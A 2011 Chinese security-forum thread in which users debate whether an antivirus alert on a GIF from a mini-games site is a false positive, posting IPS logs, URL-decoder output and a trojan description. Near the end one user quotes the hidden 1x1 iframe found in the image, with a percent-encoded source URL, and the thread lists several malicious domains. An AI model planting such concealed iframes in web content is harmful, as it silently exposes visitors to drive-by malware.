hxxp://www.shuwo.info/index.htm

wjcharles

ips又报GIF，估计还是误报

网址
hxxp://www.shuwo.info/index.htm


类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明,类别
2011/5/29 3:12,高,阻止了 96.44.140.143 的入侵企图,已阻止,不需要操作,Web Attack: Malicious Image Request 2,不需要操作,不需要操作,"96.44.140.143, 80",www.shuwo.info/templets/3839xiaoyouxi/logo.gif,"####-PC (210.#.#.#, 54148)",96.44.140.143,"TCP, www-http",

剑步如飞

NIS2011报了：

仰望_星空

关于:hxxp://www.shuwo.info/index.htm解密的日志(全体输出 -  6):

Level  1>http://www.shuwo.info/index.htm
Level  1>http://v.xi666.com/api/startpop.aspx?posid=36895
Level  1>http://www.shuwo.info/templets/3839xiaoyouxi/g.js
Level  1>http://s105.cnzz.com/stat.php?id=1000886&web_id=1000886
Level  1>http://www.shuwo.info/templets/3839xiaoyouxi/index.js
Level  1>http://v.xi666.com/api

日志由 Redoce2.1第20次修正版于 2011-5-29 10:20:08 生成。

误报、、、

轻松过一生

MSE 版本: 2.0也报
木马：Win32/Giframe.A GIF文件是一个包含恶意iframe标记检测。

技术信息（分析）
木马：Win32/Giframe.A可能到达一个计算机用户打开网页时，包含特制的GIF文件。文件检测为木马：Win32/Giframe.A包含恶意iframe标记指向特定网址。

一些网址，这些恶意的iframe标记点的是：

•dhtianyu.net
•xaioyx365.com.cn
•aaa.369678.cn
•k.thec.cn
•m586m.free.rdear.com
•66ki.cn

klinxun

看来不管本身有恶意无恶意都报，因为会被利用？

zuo

Log generated by anonymous use mdecoder 0.67
[root]http://www.shuwo.info/index.htm
    [script]http://v.xi666.com/API/StartPop.aspx?PosID=36895
    [script]http://www.shuwo.info/templets/3839xiaoyouxi/g.js
    [script]http://www.shuwo.info/templets/3839xiaoyouxi/index.js

帅就是帅

klinxun 发表于 2011-5-29 20:51
看来不管本身有恶意无恶意都报，因为会被利用？

应该报，图片里藏了个极小的iframe
<iframe src=http://%77%77%77%2E%74%61%6F%62%61%6F%67%6F%75%67%6F%75%2E%63%6E/img/svfox.html width=1 height=1></iframe>

粗看了下http://www.taobaogougou.cn/img/svfox.htm，嗯，又是noscript元素隐藏，不过已失效，没看出什么问题

klinxun

帅就是帅 发表于 2011-5-31 20:45
应该报，图片里藏了个极小的iframe

原来如此。